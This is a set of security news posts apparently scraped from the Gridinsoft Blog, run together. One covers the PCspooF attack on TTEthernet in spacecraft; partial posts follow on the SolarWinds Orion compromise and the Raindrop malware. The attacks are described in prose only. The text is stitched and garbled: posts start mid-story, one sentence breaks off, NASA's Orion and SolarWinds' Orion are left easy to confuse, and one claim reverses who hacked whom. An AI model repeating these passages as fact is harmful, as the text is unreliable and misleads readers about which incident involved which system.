Experts say vulnerabilities in this network technology, which is widely used in the space and aviation industries, could have catastrophic consequences for critical systems, including the disruption of NASA missions.

Let me remind you that we also wrote that NASA has faced 6000 cyberattacks in the past four years, and also that Malware Hides in Images from the James Webb Telescope.

TTEthernet turns ordinary Ethernet into a deterministic network with certain transfer times between nodes and significantly expands the use of the classic Ethernet standard. In such a mixed-criticality network, traffic with different timing and fault tolerance requirements can coexist.

In fact, TTEthernet allows time-critical traffic (from devices that send highly synchronized, scheduled messages according to a predetermined schedule) to use the same switches that handle non-critical traffic, such as passenger Wi-Fi on airplanes.

In addition, TTEthernet is compatible with the standard Ethernet used in conventional systems. TTEthernet isolates time-triggered traffic from so-called best-effort traffic, i.e., non-critical systems, by forwarding their messages around more important time-triggered traffic.

This allows to combine different devices in one network, mission-critical systems can work on cheaper network equipment, and the two types of traffic do not overlap.

The creators of PCspooF say that TTEthernet is essentially the “backbone of the network” in spacecraft, including NASA’s Orion spacecraft, the Lunar Gateway space station, and the Ariane 6 launch vehicle. contender” to replace the Controller Area Network bus and the FlexRay protocol.

According to the researchers, the PCspooF attack is the first attack in history that broke the isolation of different types of traffic from each other. The essence of the problem lies in the fact that PCspooF violates the synchronization system, called the Protocol control frame (PCF), whose messages cause devices to work on schedule and ensure their fast communication.

So, the researchers found that non-critical best-effort devices can display private information about the time-triggered part of the network. In addition, these devices can be used to create malicious sync messages. A malicious, non-critical device can violate the isolation guarantee on the TTEthernet network.

The compromised best-effort device can then create EMI in the switch, forcing it to send fake synchronization messages to other TTEthernet devices.

Once such an attack is launched, TTEthernet devices occasionally lose synchronization and reconnect. As a result, they lose synchronization (desynchronization can be up to a second), leading to the inability to send dozens of time-triggered messages and cause critical systems to fail. In the worst case, PCspooF provokes such failures simultaneously for all TTEthernet devices on the network, the researchers explain.

To test PCspooF, experts used NASA hardware and software components to simulate an asteroid redirection mission when Orion had to dock with an automated manned spacecraft. As a result, the PCspooF attack forced Orion to deviate from the course and completely fail the docking.

After successfully testing the attack, researchers reported the issue to organizations using TTEthernet, including NASA, the European Space Agency (ESA), Northrop Grumman Space Systems, and Airbus Defense and Space. Now, based on the data from the researchers, NASA is revising the protocols for onboard experiments and testing its off-the-shelf commercial equipment.

As protection against PCspooF and the consequences of such attacks, experts recommend using optical connectors or voltage stabilizers (to block electromagnetic interference); checking source MAC addresses to make sure they are authentic; hiding key PCF fields, using a link layer authentication protocol such as IEEE 802.1AE; increase the number of sync masters and disable dangerous state transitions.

Space technologies do not guarantee absolute protection: there are examples of authentic attacks. For example, the media wrote that DopplePaymer ransomware operators were hacked by NASA contractor.

The post PCspoF Attack Could Disable Orion Spacecraft appeared first on Gridinsoft Blog.

At the same time, Smith says that the attackers rewrote only 4032 lines of code in Orion, which contains millions of lines of code.

Let me remind you that in December 2020 it became known that unknown hackers attacked SolarWinds and infected its Orion platform with malware. Of the 300,000 SolarWinds customers, only 33,000 were using Orion, and the infected version of the platform was installed on approximately 18,000 customers, according to official figures.

As a result, the victims included such giants as Microsoft, Cisco, FireEye, as well as many US government agencies, including the State Department and the National Nuclear Security Administration.

Smith said that more than 500 Microsoft engineers are working on the analysis of this incident, but much more specialists “worked” on the side of the attackers:

Since the attack is attributed to a Russian-speaking hack group that cybersecurity experts track under the names StellarParticle (CrowdStrike), UNC2452 (FireEye), and Dark Halo (Volexity), Smith also compared the SolarWinds hack to large-scale attacks on Ukraine, which are also attributed to Russia (although the Russian Federation authorities deny their involvement).

The head of FireEye, Kevin Mandia, also spoke to reporters and explained the recent events.

As it turned out, a compromise was discovered in FireEye almost by accident. The fact is that to remotely log into a company’s VPN, employees need a two-factor authentication code, and their accounts are tied to phone numbers. The FireEye security service accidentally noticed that one of the employees linked two phone numbers to his account.

Let me remind you that Microsoft says SolarWinds hackers hunted for access to cloud resources.

The post Microsoft Says Over 1,000 Developers Worked on SolarWinds Attack appeared first on Gridinsoft Blog.

According to the researchers, Raindrop was used by cybercriminals in the last stages of the attack and was deployed only on the networks of a few selected targets (only four malware samples were found).

Let me remind you that SolarWinds, which develops software for enterprises to help manage their networks, systems and infrastructure, was hacked in mid-2019, and this attack on the supply chain is attributed to an allegedly Russian-speaking hack group, which information security experts track under the names StellarParticle (CrowdStrike), UNC2452 (FireEye) and Dark Halo (Volexity).

Among the victims are such giants as Microsoft, Cisco, FireEye, as well as many US government agencies, including the US Department of State and the National Nuclear Safety Administration.

Microsoft researchers also reported that Supernova and CosmicGale malware detected on systems running SolarWinds.

Additionally, as it became known earlier from reports of other information security experts, the attackers first deployed the Sunspot malware on the SolarWinds network.

CrowdStrike analysts wrote that this malware was used to inject the Sunburst backdoor into Orion code. The infected versions of Orion went undetected and were active between March and June 2020, while Orion user companies were compromised. According to official figures, among 300,000 SolarWinds customers only 33,000 were using Orion, and the infected version of the platform was installed on approximately 18,000 customers’ machines. At the same time, the hackers developed their attack further only in rare cases, carefully choosing large targets among the victims.

Sunburst itself was not particularly important, it only collected information about the infected network and transmitted this data to a remote server. If, finally, the malware operators decided that the victim was a promising target for the attack, they removed Sunburst and replaced it with the more powerful Teardrop backdoor Trojan.

However, Symantec now reports that in some cases attackers have chosen to use Raindrop malware over Teardrop. Both backdoors have similar functionality and are characterized by researchers as a “downloader for the Cobalt Strike beacon”, that is, they were used by cybercriminals to expand access within the compromised network. However, Raindrop and Teardrop also have differences, which the researchers listed in the table below.

The way malware was deployed was also different. For example, the widely used Teardrop backdoor was installed directly by the Sunburst malware, while Raindrop appeared mysteriously on victims’ systems where Sunburst was also installed, that is, experts have no direct evidence that Sunburst initiated its installation.

It must be said that earlier in the reports of specialists it was already mentioned that Sunburst was used to launch various fileless PowerShell payloads, many of which left almost no traces on infected hosts. It can be assumed that the mysterious “appearance” of Raindrop in the systems of victims was exactly the result of these operations.

Let me remind you that Google experts exposed sophisticated hacking campaign against Windows and Android users.

The post Raindrop is another malware detected during the SolarWinds hack appeared first on Gridinsoft Blog.